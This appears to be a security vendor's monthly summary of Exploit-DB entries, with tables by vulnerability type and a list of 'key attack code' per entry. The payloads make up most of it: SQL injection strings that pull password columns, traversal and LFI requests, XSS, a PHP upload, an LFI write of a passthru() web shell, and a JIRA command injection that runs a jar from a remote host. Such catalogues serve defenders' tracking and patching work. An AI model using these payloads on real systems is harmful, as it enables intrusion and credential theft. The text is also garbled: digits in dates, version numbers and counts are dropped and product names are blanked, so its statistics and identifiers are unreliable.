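EDB Analysis Report (05.0)
05.0.0~05.0.3
Information published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Summary of analysis (written by: Penta Security Systems, Security Evaluation Team)

Analysis of the Exploit-DB entries published in 05.0 shows that the number of reported SQL Injection vulnerabilities was notably high compared with other vulnerability types. , known as the next most widely used CMS after WordPress (the most widely used CMS in the world), is shown to be vulnerable to this SQL Injection. Because the vulnerability occurs frequently not only within  itself but also in particular , users of  can respond by applying security patches promptly. Next,  CMS also appears vulnerable to SQL Injection. The analyzed attacks included some that do not follow the usual attack patterns and succeed by manipulating the array of a specific parameter key. Because the pages where the vulnerability was found are expected to be administrator pages, the affected source code needs to be fixed quickly until a related security patch is released.

1. Reports by vulnerability type

Vulnerability type      Reports
Command Injection
Directory Traversal
File Upload
LFI
XSS                     3
SQL Injection           5
Total                   3

[Chart: Reports by vulnerability type]

2. Classification by risk level

Risk level      Reports     Percentage
                8           34.78%
Medium          5           65.%
Total           3           00.00%

[Chart: Classification by risk level]

3. Status by attack difficulty

Attack difficulty       Reports     Percentage
                        7           30.43%
Medium                  7           30.43%
Low                     9           39.3%
Total                   3           00.00%

[Chart: Status by attack difficulty]

4. Vulnerabilities by major software

Software name       Reports
                    9
                    4
ManageEngine
ElasticSearch
Kerio
JIRA
Oxwall
Dream
Total               3

[Chart: Vulnerabilities by major software]

** Vulnerability details for major software with 5 or more occurrences

EDB No.: 38445; Vulnerability type: SQL Injection; Attack difficulty: ; Attack risk: ; Vulnerability name: Real Estate Manager 3.7 - index.php
EDB No.: 3858; Vulnerability type: XSS; Attack difficulty: Low; Attack risk: Medium; Vulnerability name: - index.php XSS vulnerability
EDB No.: 3857; Vulnerability type: SQL Injection; Attack difficulty: Low; Attack risk: Medium; Vulnerability name: - index.php ()
EDB No.: 3857; Vulnerability type: SQL Injection; Attack difficulty: Low; Attack risk: Medium; Vulnerability name: - index.php ()
EDB No.: 3857; Vulnerability type: SQL Injection; Attack difficulty: Low; Attack risk: Medium; Vulnerability name: - index.php (3)
EDB No.: 38534; Vulnerability type: SQL Injection; Attack difficulty: ; Attack risk: ; Vulnerability name: 3..x - 3.4.4 - index.php
EDB No.: 38565; Vulnerability type: SQL Injection; Attack difficulty: Medium; Attack risk: Medium; Vulnerability name: Joomla JNews 8.5. - index.php ()
EDB No.: 38565; Vulnerability type: SQL Injection; Attack difficulty: Medium; Attack risk: ; Vulnerability name: Joomla JNews 8.5. - index.php ()
EDB No.: 38565; Vulnerability type: SQL Injection; Attack difficulty: Medium; Attack risk: Medium; Vulnerability name: Joomla JNews 8.5. - index.php (3)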
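Date / EDB No. / Vulnerability class / Attack difficulty / Attack risk / Vulnerability name / Key attack code / Target program / Target environment

Date: 05-0-0
EDB No.: 38383
Vulnerability class: Directory Traversal
Attack difficulty: Low
Attack risk:
Vulnerability name: ElasticSearch.6.0 - Directory Traversal vulnerability
Key attack code:
    /_snapshot/pwn/evl/../../../../../../../../
Target program: ElasticSearch
Target environment: ElasticSearch.6.0

Date: 05-0-05
EDB No.: 38395
Vulnerability class: LFI
Attack difficulty: Medium
Attack risk:
Vulnerability name: ManageEngine ServiceDesk Plus - FileDownload.jsp LFI vulnerability
Key attack code:
    /workorder/filedownload.jsp?module=support&fname=..%f..%f..%f..%f..%f..%f..%fwindows%fwin.ini%00
Target program: ManageEngine
Target environment: ManageEngine ServiceDesk Plus <= 9.

Date: 05-0-06
EDB No.: 38406
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: <= v7.0.07 - members.php SQL Injection vulnerability
Key attack code:
    /phpfusion/files/administration/members.php?aid=99ad64700ec4ce0&sortby=all&status=0' AND substr(@@version,,)='5
Target program:
Target environment: <= v7.0.07

Date: 05-0-07
EDB No.: 384
Vulnerability class: XSS
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: Management Interface 4.3.7 - / XSS vulnerability
Key attack code:
    POST / HTTP/.
    title:utf-8:string=</title><script>alert('xss by hyp3rlinx 083005')</script>&manage_editProperties:method=Save Changes
Target program:
Target environment: Management Interface 4.3.7

Date: 05-0-
EDB No.: 38446
Vulnerability class: File Upload
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: Dream CMS.3.0 - /pages/en/files-manager-administration/add-file File Upload vulnerability
Key attack code:
    POST /pages/en/files-manager-administration/add-file?path=home HTTP/.
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f

    -----------------------------7dd009908f
    Content-Disposition: form-data; name="file"; filename="billy.php"
    Content-Type: application/octet-stream

    <? phpinfo();?>
    -----------------------------7dd009908f--
Target program: Dream
Target environment: Dream CMS.3.0

Date: 05-0-
EDB No.: 38445
Vulnerability class: SQL Injection
Attack difficulty:
Attack risk:
Vulnerability name: Real Estate Manager 3.7 - index.php SQL Injection vulnerability
Key attack code:
    POST /index.php?option=com_realestatemanager&task=showcategory&catid=50&itemid=3 HTTP/.
    order_direction=asc,(select (CASE WHEN (798=798) THEN ELSE 798*(SELECT 798 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order_field=price
Target program:
Target environment: Real Estate Manager 3.7

Date: 05-0-3
EDB No.: 38450
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: Kerio Control <= 8.6. - report.php
Key attack code:
    /report.php?id='+or+''%3d''%3b+--
Target program: Kerio
Target environment: Kerio Control <= 8.6.

Date: 05-0-9
EDB No.: 38497
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: 4.0. - users.php
Key attack code:
    /admin/users.php?req=remove&u_id=03%0and%0(select%0*%0from%0(select(sleep(66)))a)--%0&
Target program:
Target environment: 4.0.

Date: 05-0-9
EDB No.: 38497
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: 4.0. - mailer.php
Key attack code:
    POST /admin/mailer.php HTTP/.
    agent[]=0 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=send
Target program:
Target environment: 4.0.

Date: 05-0-3
EDB No.: 3858
Vulnerability class: XSS
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: - index.php XSS vulnerability
Key attack code:
    POST /administrator/index.php HTTP/.
    option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%onmousemove%3d%alert()%%&new_location_fr_fr=&level=&parent=&function=add_location
Target program:
Target environment: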
Date: 05-0-3
EDB No.: 3857
Vulnerability class: SQL Injection
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: - index.php SQL Injection vulnerability ()
Key attack code:
    POST /administrator/index.php HTTP/.
    option=com_rpl&view=addon_membership_members&format=edit&id=84' and =--
Target program:
Target environment:

Date: 05-0-3
EDB No.: 3857
Vulnerability class: SQL Injection
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: - index.php SQL Injection vulnerability ()
Key attack code:
    POST /administrator/index.php HTTP/.
    option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy&copy_field=308' and =-- &copy_from=&copy_to=en_gb&copy_method=
Target program:
Target environment:

Date: 05-0-3
EDB No.: 3857
Vulnerability class: SQL Injection
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: - index.php SQL Injection vulnerability (3)
Key attack code:
    POST /administrator/index.php HTTP/.
    option=com_rpl&view=property_structure&format=ajax&function=update_field&id=300&options=0&css=&tip=&style=&name=&cat_id=&text_search=0&plisting=0&pshow=' and =--&pwizard=&mode=add
Target program:
Target environment:

Date: 05-0-6
EDB No.: 38534
Vulnerability class: SQL Injection
Attack difficulty:
Attack risk:
Vulnerability name: 3..x - 3.4.4 - index.php
Key attack code:
    /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=&list[select]=(select++from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+limit+0,),floor(rand(0)*))x+from+information_schema.tables+group+by+x)a)
Target program:
Target environment: 3..x - 3.4.4

Date: 05-0-8
EDB No.: 3855
Vulnerability class: Command Injection
Attack difficulty:
Attack risk:
Vulnerability name: JIRA and HipChat for JIRA Plugin - /rest/hipchat/integrations/.0/message/render/ Command Injection vulnerability
Key attack code:
    POST /rest/hipchat/integrations/.0/message/render/ HTTP/.
    Content-Type: application/json

    { "message": " $i8n.getclass().forname(\'java.lang.runtime\').getmethod(\'getruntime\', null).invoke(null, null).exec(\'' + java -jar \\\\9.68..34\\public\\payload.jar + '\').waitfor() " }
Target program: JIRA
Target environment: JIRA product versions: 6.3.5 <= version < 6.4.

Date: 05-0-9
EDB No.: 38565
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: Joomla JNews 8.5. - index.php ()
Key attack code:
    POST /joomlatest/index.php?option=com_jnews HTTP/.
    Itemid=88&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=&subscribed[]=0&sub_list_id[]= RLIKE (SELECT (CASE WHEN (7097=7097) THEN ELSE 0x8 END))&acc_level[]=9&passwordA=0oYmqypNqP6eU&fromfrontend=&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&Itemid=88&d65abd4ca0e4f5d3e5af6b5c390ae7=
Target program:
Target environment: JNews 8.5.
Date: 05-0-9
EDB No.: 38565
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk:
Vulnerability name: Joomla JNews 8.5. - index.php ()
Key attack code:
    POST /joomlatest/index.php?option=com_jnews HTTP/.
    Itemid=88&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=&subscribed[]=0&sub_list_id[]= AND EXTRACTVALUE(8483,CONCAT(0x5c,0x76b78767,(SELECT (ELT(8483=8483,))),0x76b786b7))&acc_level[]=9&passworda=0oymqypnqp6eu&fromfrontend=&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&itemid=88&d65abd4ca0e4f5d3e5af6b5c390ae7=
Target program:
Target environment: JNews 8.5.

Date: 05-0-9
EDB No.: 38565
Vulnerability class: SQL Injection
Attack difficulty: Medium
Attack risk: Medium
Vulnerability name: Joomla JNews 8.5. - index.php (3)
Key attack code:
    POST /joomlatest/index.php?option=com_jnews HTTP/.
    Itemid=88&name=asdf&email=asdf@asdf.com&receive_html=0&timezone=00:00:00&confirmed=&subscribed[]=0&sub_list_id[]=(SELECT * FROM (SELECT(SLEEP(5)))Qrax)&acc_level[]=9&passwordA=0oymqypnqp6eu&fromfrontend=&act=subscribe&subscriber_id=0&user_id=0&option=com_jnews&task=save&boxchecked=0&itemid=88&d65abd4ca0e4f5d3e5af6b5c390ae7=
Target program:
Target environment: JNews 8.5.

Date: 05-0-30
EDB No.: 3858
Vulnerability class: XSS
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: Oxwall.7.4 - /admin/pages/maintenance XSS vulnerability
Key attack code:
    POST /admin/pages/maintenance HTTP/.
    form_name=maintenance&maintenance_enable=on&save=Save&maintenance_text=<script>alert('ImmuniWeb');</script>
Target program: Oxwall
Target environment: Oxwall.7.4

Date: 05-0-30
EDB No.: 38579
Vulnerability class: LFI
Attack difficulty: Low
Attack risk: Medium
Vulnerability name: CMS - admin_editor.php LFI vulnerability
Key attack code:
    POST /pligg-cms-master/admin/admin_editor.php HTTP/.
    the_file=..%f..%f..%f..%f..%f..%f..%f..%f..%f..%f..%fvar%fwww%fhtml%fpligg-cms-master%f404.php&updatedfile=<?php passthru($_get['x']);?>&isempty=&save=save+changes
Target program:
Target environment: CMS

Date: 05-0-30
EDB No.: 38577
Vulnerability class: SQL Injection
Attack difficulty:
Attack risk:
Vulnerability name: CMS - story.php SQL Injection vulnerability
Key attack code:
    /pligg-cms-master/story.php?title=googleblabla&reply=&comment_id=%0union%0all%0select%0,,,,,,,password,password,%0from%0mysql.user%0%3
Target program:
Target environment: CMS

Date: 05-0-30
EDB No.: 38577
Vulnerability class: SQL Injection
Attack difficulty:
Attack risk:
Vulnerability name: CMS - admin_users.php SQL Injection vulnerability
Key attack code:
    POST /pligg-cms-master/admin/admin_users.php HTTP/.
    frmsubmit=userlist&admin_acction=&token=valid_csrf_TOKEN&all=on&enabled[ AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3]=
Target program:
Target environment: CMS
Date: 05-0-30
EDB No.: 38577
Vulnerability class: SQL Injection
Attack difficulty:
Attack risk:
Vulnerability name: CMS - upload.php
Key attack code:
    POST /pligg-cms-master/modules/upload/upload.php HTTP/.
    id=&number=&comment=' AND IF(SUBSTRING(version(),, )%3D5,BENCHMARK(500000000,version()),null) %3
Target program:
Target environment: CMS